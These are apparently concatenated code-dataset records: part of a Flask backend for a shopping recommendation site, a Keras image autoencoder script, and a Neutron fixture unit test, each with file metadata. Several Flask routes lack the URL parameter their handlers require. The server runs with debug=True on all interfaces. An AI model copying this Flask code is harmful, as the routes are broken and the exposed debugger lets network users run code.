flask_get_cost_By_Time():\n j = request.json\n token = request.args.get(\"token\")\n day = request.args.get(\"day\")\n l = get_cost_By_Time(token,day)\n return dumps(l)\n\n@app.route('/get_record', methods=['GET'])\ndef flask_get_record():\n token = request.headers.get('Authorization',None)\n l = get_record(token)\n return dumps(l)\n#----------------------------------------------cart-------------------------------\n\n@app.route('/add_product_to_cart/', methods=['GET'])\ndef flask_add_product_to_cart(id):\n token = request.headers.get('Authorization',None)\n id=int(id)\n l = add_product_to_cart(token,id)\n return dumps(l)\n\n@app.route('/remove_product_from_cart/', methods=['DELETE'])\ndef flask_remove_product_from_cart(id):\n token = request.headers.get('Authorization',None)\n id=int(id)\n l = remove_product_from_cart(token,id)\n return dumps(l)\n\n@app.route('/get_cart', methods=['GET'])\ndef flask_get_cart():\n token = request.headers.get('Authorization',None)\n l = get_cart(token)\n return dumps(l)\n\n\n\n#----------------------------------------------recommend-------------------------------\n\n@app.route('/random_recommend', methods=['GET'])\ndef flask_random_recommend():\n number = request.headers.get('Numbers',None)\n number = int(number)\n l=random_recommendation(number) # return 10 product\n return dumps(l)\n\n@app.route('/product_recommendation/', methods=['GET'])\ndef flask_product_recommendation(id):\n id=int(id)\n number = request.headers.get('Numbers',None)\n l=product_recommendation(id,number) # return 10 product\n return dumps(l)\n\n\n@app.route('/buy_recommendation/', methods=['GET'])\ndef flask_buy_recommendation(id):\n id=int(id)\n number = request.headers.get('Numbers',None)\n l=buy_recommendation(id,number) # return 10 product\n return dumps(l)\n\n@app.route('/purchase_record_recommendation', methods=['GET'])\ndef flask_purchase_record_recommendation():\n token = request.headers.get('Authorization',None)\n number = request.headers.get('Numbers',None)\n number = int(number)\n l=purchase_record_recommendation(token,number) # return 10 product\n return dumps(l)\n\n#-----------------------------------------------search------------------------------------\n@app.route('/search', methods=['GET'])\ndef flask_search():\n search_word = request.headers.get('search_word',None)\n max_price = int(request.headers.get('max_price',None))\n min_price = int(request.headers.get('min_price',None))\n l = search(search_word,min_price,max_price)\n return dumps(l)\n\n@app.route('/search_with_token', methods=['GET'])\ndef flask_search_with_token():\n token = request.headers.get('Authorization',None)\n search_word = request.headers.get('search_word',None)\n max_price = request.headers.get('max_price',None)\n min_price = request.headers.get('min_price',None)\n l = search_with_token(token,search_word,min_price,max_price)\n return dumps(l)\n\n\n#-------------------------------------------cahtbot-----------------------------\n'''\n@app.route('/chatbot', methods=['GET'])\ndef flask_chatbot():\n j = request.json\n word=j['word']\n l=chatbot_handle(word)\n return dumps(l)\n'''\n@app.route('/chatbot', methods=['GET'])\ndef flask_chatbot():\n word = request.headers.get('word',None)\n l=chatbot_handle(word)\n return dumps(l)\n\n@app.route('/chatbot_get', methods=['GET'])\ndef flask_chatbot_get():\n l=load_chatDB()\n return dumps(l)\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5000,debug=True)\n", "sub_path": "RecommendWebsite/reed/Flask_all.py", "file_name": "Flask_all.py", "file_ext": "py", "file_size_in_byte": 10244, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "flask.request.json", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 21, "usage_type": "call"}, {"api_name": "app.route", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 31, "usage_type": "call"}, {"api_name": "app.route", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 39, "usage_type": "call"}, {"api_name": "app.route", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 48, "usage_type": "call"}, {"api_name": "app.route", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "app.route", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 61, "usage_type": "call"}, {"api_name": "app.route", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 67, "usage_type": "call"}, {"api_name": "app.route", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 75, "usage_type": "call"}, {"api_name": "app.route", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 82, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 93, "usage_type": "call"}, {"api_name": "app.route", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 98, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 100, "usage_type": "call"}, {"api_name": "app.route", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 104, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 104, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 105, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 105, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 116, "usage_type": "call"}, {"api_name": "app.route", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 121, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 121, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 122, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 122, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 123, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 123, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 126, "usage_type": "call"}, {"api_name": "app.route", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 130, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 131, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 131, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 135, "usage_type": "call"}, {"api_name": "app.route", "line_number": 128, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 139, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 139, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 140, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 140, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 140, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 141, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 141, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 141, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 144, "usage_type": "call"}, {"api_name": "app.route", "line_number": 137, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 148, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 148, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 149, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 149, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 150, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 150, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 150, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 153, "usage_type": "call"}, {"api_name": "app.route", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 157, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 157, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 158, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 158, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 158, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 159, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 159, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 159, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 162, "usage_type": "call"}, {"api_name": "app.route", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 166, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 166, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 167, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 167, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 168, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 168, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 171, "usage_type": "call"}, {"api_name": "app.route", "line_number": 164, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 175, "usage_type": "call"}, {"api_name": "app.route", "line_number": 173, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 179, "usage_type": "call"}, {"api_name": "app.route", "line_number": 177, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 184, "usage_type": "call"}, {"api_name": "app.route", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 189, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 189, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 190, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 190, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 190, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 191, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 191, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 191, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 193, "usage_type": "call"}, {"api_name": "app.route", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 197, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 197, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 198, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 198, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 198, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 199, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 199, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 199, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 201, "usage_type": "call"}, {"api_name": "app.route", "line_number": 195, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 206, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 206, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 207, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 207, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 207, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 211, "usage_type": "call"}, {"api_name": "app.route", "line_number": 204, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 216, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 216, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 217, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 217, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 217, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 220, "usage_type": "call"}, {"api_name": "app.route", "line_number": 214, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 228, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 228, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 228, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 230, "usage_type": "call"}, {"api_name": "app.route", "line_number": 226, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 234, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 234, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 235, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 235, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 235, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 236, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 236, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 236, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 238, "usage_type": "call"}, {"api_name": "app.route", "line_number": 232, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 242, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 242, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 243, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 243, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 243, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 244, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 244, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 244, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 246, "usage_type": "call"}, {"api_name": "app.route", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 250, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 250, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 250, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 252, "usage_type": "call"}, {"api_name": "app.route", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 257, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 257, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 257, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 260, "usage_type": "call"}, {"api_name": "app.route", "line_number": 255, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 264, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 264, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 264, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 267, "usage_type": "call"}, {"api_name": "app.route", "line_number": 262, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 271, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 271, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 271, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 273, "usage_type": "call"}, {"api_name": "app.route", "line_number": 269, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 281, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 281, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 281, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 284, "usage_type": "call"}, {"api_name": "app.route", "line_number": 279, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 289, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 289, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 289, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 291, "usage_type": "call"}, {"api_name": "app.route", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 297, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 297, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 297, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 299, "usage_type": "call"}, {"api_name": "app.route", "line_number": 294, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 303, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 303, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 303, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 304, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 304, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 304, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 307, "usage_type": "call"}, {"api_name": "app.route", "line_number": 301, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 312, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 312, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 312, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 313, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 313, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 313, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 314, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 314, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 314, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 316, "usage_type": "call"}, {"api_name": "app.route", "line_number": 310, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 320, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 320, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 320, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 321, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 321, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 321, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 322, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 322, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 322, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 323, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 323, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 323, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 325, "usage_type": "call"}, {"api_name": "app.route", "line_number": 318, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 339, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 339, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 339, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 341, "usage_type": "call"}, {"api_name": "app.route", "line_number": 337, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 346, "usage_type": "call"}, {"api_name": "app.route", "line_number": 343, "usage_type": "call"}, {"api_name": "app.run", "line_number": 349, "usage_type": "call"}]} {"seq_id": "23583105", "text": "from sklearn.cluster import KMeans\nimport keras\nfrom keras import Sequential, Model\nfrom keras.layers import Conv2D, UpSampling2D, MaxPool2D, Dense, Reshape, Flatten\nfrom keras import backend as K\nimport glob\nfrom PIL import Image\nfrom PIL.ImageOps import mirror\nimport matplotlib.pyplot as plt\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport shutil\n\ntrain_df = pd.read_csv(\"input/train_relationships.csv\")\n\nM = 1000\ni = 0\nimage_datas = list()\nfor path in train_df.p1:\n for f in glob.glob('input/train/' + path + \"/*.jpg\", recursive=True):\n temp = Image.open(f)\n image = temp.copy()\n image_datas.append(image)\n temp.close()\n i += 1\n if i == M:\n break\n if i == M:\n break\n\nnp.random.shuffle(image_datas)\n\nfor i in range(len(image_datas)):\n image_datas[i] = image_datas[i].resize((64, 64), Image.ANTIALIAS)\n\nfor i in range(len(image_datas)):\n image_datas[i] = np.asarray(image_datas[i]) / 255.\nimage_datas = np.array(image_datas)\n\nencoder = Sequential([\n Conv2D(filters=32, kernel_size=18, strides=1, activation=\"relu\", padding=\"same\", input_shape=(64, 64, 3)),\n MaxPool2D(pool_size=2, padding=\"same\"),\n Conv2D(filters=64, kernel_size=11, strides=1, activation=\"relu\", padding=\"same\"),\n MaxPool2D(pool_size=2, padding=\"same\"),\n Conv2D(filters=128, kernel_size=3, strides=1, activation=\"relu\", padding=\"same\"),\n MaxPool2D(pool_size=2, padding=\"same\"),\n Flatten(),\n Dense(200),\n Dense(100),\n Dense(20),\n Dense(8)\n])\ndecoder = Sequential([\n Dense(20, input_shape=(1, 8)),\n Dense(100),\n Dense(200),\n Dense(8192),\n Reshape((8, 8, 128)),\n UpSampling2D(2),\n Conv2D(filters=64, kernel_size=3, strides=1, activation=\"relu\", padding=\"same\"),\n UpSampling2D(2),\n Conv2D(filters=32, kernel_size=11, strides=1, activation=\"relu\", padding=\"same\"),\n UpSampling2D(2),\n Conv2D(filters=3, kernel_size=18, strides=1, activation=\"sigmoid\", padding=\"same\")\n])\nautoencoder = Sequential([encoder, decoder])\n\nautoencoder.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"binary_crossentropy\"])\n\nbatch_size = 32\nepochs = 10\nlearning_rate = 0.1\n\nhistory = autoencoder.fit(image_datas.reshape(image_datas.shape), image_datas.reshape(-1, 64, 64, 3), batch_size, epochs, validation_split=0.2, verbose=1)\n\nplt.figure(figsize=(10,10))\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\nencoder.summary()\ndecoder.summary()\n\nn_img = 4\nind = np.random.choice(range(len(image_datas)), n_img)\npred = autoencoder.predict(image_datas[ind], batch_size)\n\nf, ax = plt.subplots(2, n_img, figsize=(10, 10))\nfor i in range(n_img):\n ax[0][i].imshow(image_datas[ind[i]])\n ax[1][i].imshow(pred[i])\n\n # import winsound\n # frequency = 440 # Set Frequency To 2500 Hertz\n # duration = 1000 # Set Duration To 1000 ms == 1 second\n # winsound.Beep(frequency, duration)\n # winsound.Beep(440, 1000)\n", "sub_path": "trials.py", "file_name": "trials.py", "file_ext": "py", "file_size_in_byte": 3126, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 20, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.random.shuffle", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 34, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.Sequential", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 41, "usage_type": "call"}, {"api_name": "keras.layers.MaxPool2D", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 43, "usage_type": "call"}, {"api_name": "keras.layers.MaxPool2D", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.MaxPool2D", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 48, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 51, "usage_type": "call"}, {"api_name": "keras.Sequential", "line_number": 53, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 54, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 55, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 56, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.layers.Reshape", "line_number": 58, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 59, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 60, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 61, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 64, "usage_type": "call"}, {"api_name": "keras.Sequential", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 89, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}]} {"seq_id": "41728479", "text": "# Copyright (c) 2015 Thales Services SAS\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport fixtures\nimport testscenarios\n\nfrom neutron.tests import base\nfrom neutron.tests import tools\n\n\nclass NoErrorFixture(tools.SafeFixture):\n\n def __init__(self):\n super(NoErrorFixture, self).__init__()\n self.cleaned = False\n self.called = False\n\n def setUp(self):\n super(NoErrorFixture, self).setUp()\n self.called = True\n\n def cleanUp(self):\n self.cleaned = True\n super(NoErrorFixture, self).cleanUp()\n\n\nclass ErrorAfterFixtureSetup(NoErrorFixture):\n\n def setUp(self):\n super(tools.SafeFixture, self).setUp()\n raise ValueError\n\n\nclass ErrorBeforeFixtureSetup(NoErrorFixture):\n\n def setUp(self):\n raise ValueError\n\n\nclass TestSafeFixture(testscenarios.WithScenarios, base.BaseTestCase):\n scenarios = [\n ('testtools useFixture', dict(fixtures=False)),\n ('fixtures useFixture', dict(fixtures=True)),\n ]\n\n def setUp(self):\n super(TestSafeFixture, self).setUp()\n if self.fixtures:\n self.parent = self.useFixture(fixtures.Fixture())\n else:\n self.parent = self\n\n def test_no_error(self):\n fixture = NoErrorFixture()\n self.parent.useFixture(fixture)\n self.assertTrue(fixture.called)\n self.assertFalse(fixture.cleaned)\n\n def test_error_after_root_setup(self):\n fixture = ErrorAfterFixtureSetup()\n self.assertRaises(ValueError, self.parent.useFixture, fixture)\n self.assertTrue(fixture.cleaned)\n\n def test_error_before_root_setup(self):\n fixture = ErrorBeforeFixtureSetup()\n # NOTE(cbrandily); testtools.useFixture crashs badly if Fixture.setUp\n # is not called or fails.\n self.assertRaises(AttributeError, self.parent.useFixture, fixture)\n self.assertFalse(fixture.cleaned)\n", "sub_path": "neutron/tests/functional/test_tools.py", "file_name": "test_tools.py", "file_ext": "py", "file_size_in_byte": 2460, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", 